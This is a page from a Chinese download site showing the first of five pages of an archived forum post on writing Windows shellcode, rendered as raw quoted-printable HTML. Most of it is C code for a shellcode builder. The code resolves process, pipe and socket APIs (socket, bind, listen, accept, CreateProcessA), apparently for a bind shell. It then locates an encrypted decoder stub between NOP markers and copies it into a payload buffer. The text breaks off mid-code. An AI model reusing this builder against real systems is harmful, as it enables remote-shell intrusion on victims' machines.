⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站
📤 上传资源

📄 关于windows下shellcode编写的一点思考.mht

📁 精华BBS贴子
💻 MHT
📖 第 1 页 / 共 5 页
字号:
🔍
12345 
                        =
8192=D7=E3=B9=BB=A3=BF<BR>#define&nbsp;&nbsp;MAX_api_strlen 0x400&nbsp;=20
                        =
&nbsp;//APIstr=D7=D6=B7=FB=B4=AE=B5=C4=B3=A4=B6=C8<BR>#define&nbsp;&nbsp;=
API_endstr&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;"strend"//API=BD=E1=CE=B2=B1=EA=BC=C7=D7=D6=B7=FB=B4=AE=
&nbsp; &nbsp;=20
                        =
<BR>#define&nbsp;&nbsp;API_endstrlen&nbsp;&nbsp;0x06&nbsp;=20
                        &nbsp; =
//=B1=EA=BC=C7=D7=D6=B7=FB=B4=AE=B3=A4=B6=C8<BR><BR>#define PROC_BEGIN=20
                        __asm&nbsp;&nbsp;_emit 0x90 =
__asm&nbsp;&nbsp;_emit 0x90=20
                        __asm&nbsp;&nbsp;_emit 0x90 =
__asm&nbsp;&nbsp;_emit=20
                        0x90\<BR>&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp; =
__asm&nbsp;&nbsp;_emit=20
                        0x90 __asm&nbsp;&nbsp;_emit 0x90 =
__asm&nbsp;&nbsp;_emit=20
                        0x90 __asm&nbsp;&nbsp;_emit 0x90<BR>#define =
PROC_END=20
                        =
PROC_BEGIN<BR>//=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=
=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=
=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=
=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=
=A3=AD=A3=AD=A3=AD=A3=AD<BR>enum{&nbsp;=20
                        &nbsp;&nbsp; &nbsp; //Kernel32<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;_CreatePipe,<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;_CreateProcessA,<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;_CloseHandle,<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;_PeekNamedPipe,<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;_ReadFile,<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;_WriteFile,<BR>&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;_ExitProcess,<BR><BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;//WS2_32<BR>&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;_socket,<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;_bind,<BR>&nbsp; =

                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;_listen,<BR>&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;_accept,<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;_send,<BR>&nbsp; =

                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;_recv,<BR>&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; =

                        &nbsp;&nbsp; &nbsp;_ioctlsocket,<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;_closesocket,<BR><BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;//=B1=BE=BB=FA=B2=E2=CA=D4User32<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;_MessageBeep,<BR>&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;_MessageBoxA,<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        =
&nbsp;API_num<BR>};<BR><BR>//<BR>//=B4=FA=C2=EB=D5=E2=C0=EF=BF=AA=CA=BC<B=
R>//<BR>int=20
                        __cdecl main(int argc, char=20
                        =
**argv)<BR>{<BR>&nbsp;&nbsp;//shellcode=D6=D0=D2=AA=D3=C3=B5=BD=B5=C4=D7=D6=
=B7=FB=B4=AE<BR>&nbsp;&nbsp;static=20
                        char ApiStr[]=3D"\x1e\x6c"&nbsp;=20
                        &nbsp;//=B6=CB=BF=DA=B5=D8=D6=B7<BR><BR>&nbsp; =
&nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp; =
&nbsp;//Kernel32=B5=C4API=BA=AF=CA=FD=C3=FB=B3=C6<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;"CreatePipe""\x0"<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;"CreateProcessA""\x0"<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;"CloseHandle""\x0"<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;"PeekNamedPipe""\x0"<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;"ReadFile""\x0"<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;"WriteFile""\x0"<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;"ExitProcess""\x0"<BR><BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;//=C6=E4=CB=FCAPI=D6=D0=D3=C3=B5=BD=B5=C4API<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;"wsock32.dll""\x0"<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;"socket""\x0"<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;"bind""\x0"<BR>&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;"listen""\x0"<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;"accept""\x0"<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;"send""\x0"<BR>&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;"recv""\x0"<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;"ioctlsocket""\x0"<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;"closesocket""\x0"<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;//=B1=BE=BB=FA=B2=E2=CA=D4<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;"user32.dll""\x0"<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;"MessageBeep""\x0"<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;"MessageBoxA""\x0"<BR><BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;"\x0\x0\x0\x0\x0"<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        =
&nbsp;"strend";<BR><BR>&nbsp;&nbsp;char&nbsp;&nbsp;*fnbgn_str=3D"\x90\x90=
\x90\x90\x90\x90\x90\x90\x90";&nbsp;&nbsp;//=B1=EA=BC=C7=BF=AA=CA=BC=B5=C4=
=D7=D6=B7=FB=B4=AE<BR>&nbsp;&nbsp;char&nbsp;&nbsp;*fnend_str=3D"\x90\x90\=
x90\x90\x90\x90\x90\x90\x90";&nbsp;&nbsp;//=B1=EA=BC=C7=BD=E1=CA=F8=B5=C4=
=D7=D6=B7=FB=B4=AE<BR><BR>&nbsp;&nbsp;char&nbsp;&nbsp;buff[BUFFSIZE];&nbs=
p;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        =
&nbsp;//=BB=BA=B3=E5=C7=F8<BR>&nbsp;&nbsp;char&nbsp;&nbsp;sc_buff[sc_BUFF=
SIZE];&nbsp;=20
                        =
&nbsp;//ShellCodes=BB=BA=B3=E5<BR>&nbsp;&nbsp;char&nbsp;&nbsp;*pDcrypt_ad=
dr,<BR>&nbsp;=20
                        &nbsp;&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;*pSc_addr;<BR><BR>&nbsp;&nbsp;int&nbsp;=20
                        &nbsp;buff_len;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        =
&nbsp;//=BB=BA=B3=E5=B3=A4=B6=C8<BR>&nbsp;&nbsp;int&nbsp;=20
                        &nbsp;EncCode_len;&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; =
&nbsp;//=BC=D3=C3=DC=B1=E0=C2=EB=B4=FA=C2=EB=B3=A4=B6=C8<BR>&nbsp;&nbsp;i=
nt&nbsp;=20
                        &nbsp;Sc_len;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;//=D4=AD=CA=BCShellCode=B5=C4=B3=A4=B6=C8<BR><BR>&nbsp;=
&nbsp;int&nbsp;=20
                        &nbsp;&nbsp; &nbsp;=20
                        i,k;<BR>&nbsp;&nbsp;unsigned&nbsp;&nbsp;char=20
                        =
ch;<BR><BR>&nbsp;&nbsp;//<BR>&nbsp;&nbsp;//=BB=F1=B5=C3DecryptSc()=B5=D8=D6=
=B7=A3=AC=BD=E2=C2=EB=BA=AF=CA=FD=B5=C4=B5=D8=D6=B7=A3=AC=C8=BB=BA=F3=CB=D1=
=CB=F7MAX_Enc_Len=D7=D6=BD=DA=A3=AC=B2=E9=D5=D2=B1=EA=BC=C7=BF=AA=CA=BC=B5=
=C4=D7=D6=B7=FB=B4=AE<BR>&nbsp;&nbsp;//=BB=F1=B5=C3=D5=E6=D5=FD=B5=C4=BD=E2=
=C2=EB=BB=E3=B1=E0=B4=FA=C2=EB=B5=C4=BF=AA=CA=BC=B5=D8=D6=B7=A3=ACMAX_Enc=
_Len=B6=A8=D2=E5=CE=AA1024=D7=D6=BD=DA=D2=BB=B0=E3=D5=E2=D2=D1=BE=AD=D7=E3=
=B9=BB=C1=CB=A3=AC=C8=BB=BA=F3=BD=AB=D5=E2<BR>&nbsp;&nbsp;//=B2=BF=B7=D6=B4=
=FA=C2=EB=BF=BD=B1=B4=C8=EB=B4=FD=CA=E4=B3=F6ShellCode=B5=C4=BB=BA=B3=E5=C7=
=F8=D7=BC=B1=B8=BD=F8=D2=BB=B2=BD=B4=A6=C0=ED<BR>&nbsp;&nbsp;//<BR>&nbsp;=
&nbsp;pDcrypt_addr=3D(char=20
                        =
*)DecryptSc;<BR><BR>&nbsp;&nbsp;//=B6=A8=CE=BB=C6=E4=CA=B5=BC=CA=B5=D8=D6=
=B7=A3=AC=D2=F2=CE=AA=D4=DA=D3=C3Visual=20
                        =
Studio=C9=FA=B3=C9=B5=F7=CA=D4=B0=E6=B1=BE=B5=F7=CA=D4=B5=C4=C7=E9=BF=F6=CF=
=C2=A3=AC=B1=E0=D2=EB=C6=F7=BB=E1=C9=FA=B3=C9=CC=F8=D7=AA=B1=ED=A3=AC<BR>=
&nbsp;&nbsp;//=B4=D3=CC=F8=D7=AA=B1=ED=D6=D0=D2=AA=BC=C6=CB=E3=B5=C3=B3=F6=
=BA=AF=CA=FD=CA=B5=BC=CA=CB=F9=D4=DA=B5=C4=B5=D8=D6=B7=A3=AC=D5=E2=D6=BB=CA=
=C7=CE=AA=C1=CB=B7=BD=B1=E3=D3=C3VC=B5=F7=CA=D4<BR><BR>&nbsp;&nbsp;ch=3D*=
pDcrypt_addr;<BR>&nbsp;&nbsp;if=20
                        (ch=3D=3D0xe9)<BR>&nbsp;&nbsp;{<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;pDcrypt_addr++;<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;i=3D*(int *)pDcrypt_addr;<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;pDcrypt_addr+=3D(i+4);&nbsp; &nbsp;&nbsp;=20
                        =
&nbsp;//=B4=CB=CA=B1=D6=B8=CF=F2=BA=AF=CA=FD=B5=C4=CA=B5=BC=CA=B5=D8=D6=B7=
<BR>&nbsp;&nbsp;}<BR>&nbsp;&nbsp;//=D5=D2=B5=BD=BD=E2=C2=EB=B4=FA=C2=EB=B5=
=C4=BF=AA=CA=BC=B2=BF=B7=D6<BR>&nbsp;&nbsp;for(k=3D0;k&lt;MAX_Enc_Len;++k=
)=20
                        =
if(memcmp(pDcrypt_addr+k,fnbgn_str,BEGINSTRLEN)=3D=3D0)=20
                        break;<BR><BR>&nbsp;&nbsp;if (k&lt;MAX_Enc_Len)=20
                        pDcrypt_addr+=3D(k+8);&nbsp;=20
                        =
&nbsp;//=C8=E7=D5=D2=B5=BD=B6=A8=CE=BB=CA=B5=BC=CA=B4=FA=C2=EB=B5=C4=BF=AA=
=CA=BC<BR>&nbsp;&nbsp;else=20
                        <BR>&nbsp;&nbsp;{<BR>&nbsp; &nbsp;&nbsp;=20
                        =
&nbsp;//=CF=D4=CA=BE=B4=ED=CE=F3=D0=C5=CF=A2<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;k=3D0;<BR>&nbsp; &nbsp;&nbsp; =
&nbsp;printf("\nNo=20
                        Begin str defined in Decrypt function!Please =
Check=20
                        before go on...\n");<BR>&nbsp; &nbsp;&nbsp; =
&nbsp;return=20
                        =
0;<BR>&nbsp;&nbsp;}<BR><BR>&nbsp;&nbsp;for(k=3D0;k&lt;MAX_Enc_Len;++k)=20
                        =
if(memcmp(pDcrypt_addr+k,fnend_str,ENDSTRLEN)=3D=3D0)=20
                        break;<BR><BR>&nbsp;&nbsp;if (k&lt;MAX_Enc_Len)=20
                        EncCode_len=3Dk;<BR>&nbsp;&nbsp;else=20
                        <BR>&nbsp;&nbsp;{<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;k=3D0;<BR>&nbsp; &nbsp;&nbsp; =
&nbsp;printf("\nNo End=20
                        str defined in Decrypt function!Please=20
                        Check....\n");<BR>&nbsp; &nbsp;&nbsp; =
&nbsp;return=20
                        =
0;<BR>&nbsp;&nbsp;}<BR><BR>&nbsp;&nbsp;memset(buff,nop_CODE,BUFFSIZE);&nb=
sp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;//=BB=BA=B3=E5=C7=F8=CC=EE=B3=E4<BR>&nbsp;&nbsp;memcpy(=
buff+nop_LEN,pDcrypt_addr,EncCode_len);&nbsp;=20
                        &nbsp;&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;//=B0=D1DecryptSc=B4=FA=C2=EB=B8=B4=D6=C6=BD=F8buff<BR>=
<BR>&nbsp;&nbsp;//<BR>&nbsp;&nbsp;//=B4=A6=C0=EDShellCode=B4=FA=C2=EB,=C8=
=E7=B9=FB=D0=E8=D2=AA=B6=A8=CE=BB=B5=BD=B4=FA=C2=EB=B5=C4=BF=AA=CA=BC<BR>=
&nbsp;&nbsp;//<BR>&nbsp;&nbsp;pSc_addr=3D(char=20
                        *)ShellCodes;&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;//shellcode=B5=C4=B5=D8=D6=B7<BR><BR>&nbsp;&nbsp;//=B5=F7=
=CA=D4=D7=B4=CC=AC=CF=C2=B5=C4=BA=AF=CA=FD=B5=D8=D6=B7=B4=A6=C0=ED=A3=AC=B1=
=E3=D3=DA=B5=F7=CA=D4<BR>&nbsp;&nbsp;ch=3D*pSc_addr;<BR>&nbsp;&nbsp;if=20
                        (ch=3D=3D0xe9)<BR>&nbsp;&nbsp;{<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;pSc_addr++;<BR>&nbsp; &nbsp;&nbsp; =
&nbsp;i=3D*(int=20
                        *)pSc_addr;<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;pSc_addr+=3D(i+4);&nbsp; &nbsp;&nbsp;=20
                        =
&nbsp;//=B4=CB=CA=B1=D6=B8=CF=F2=BA=AF=CA=FD=B5=C4=CA=B5=BC=CA=B5=D8=D6=B7=
<BR>&nbsp;&nbsp;}<BR><BR>&nbsp;&nbsp;//=C8=E7=B9=FB=D0=E8=D2=AA=B6=A8=CE=BB=
=B5=BD=CA=B5=BC=CAShellCodes()=B5=C4=BF=AA=CA=BC=A3=AC=D5=E2=B8=F6=B0=E6=B1=
=BE=D6=D0=CA=C7=B2=BB=D0=E8=D2=AA=B5=C4<BR>&nbsp;&nbsp;/*<BR>&nbsp;&nbsp;=
for=20
                        (k=3D0;k&lt;MAX_Sc_Len ;++k )=20
                        =
if(memcmp(pSc_addr+k,fnbgn_str,BEGINSTRLEN)=3D=3D0)=20
12345

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -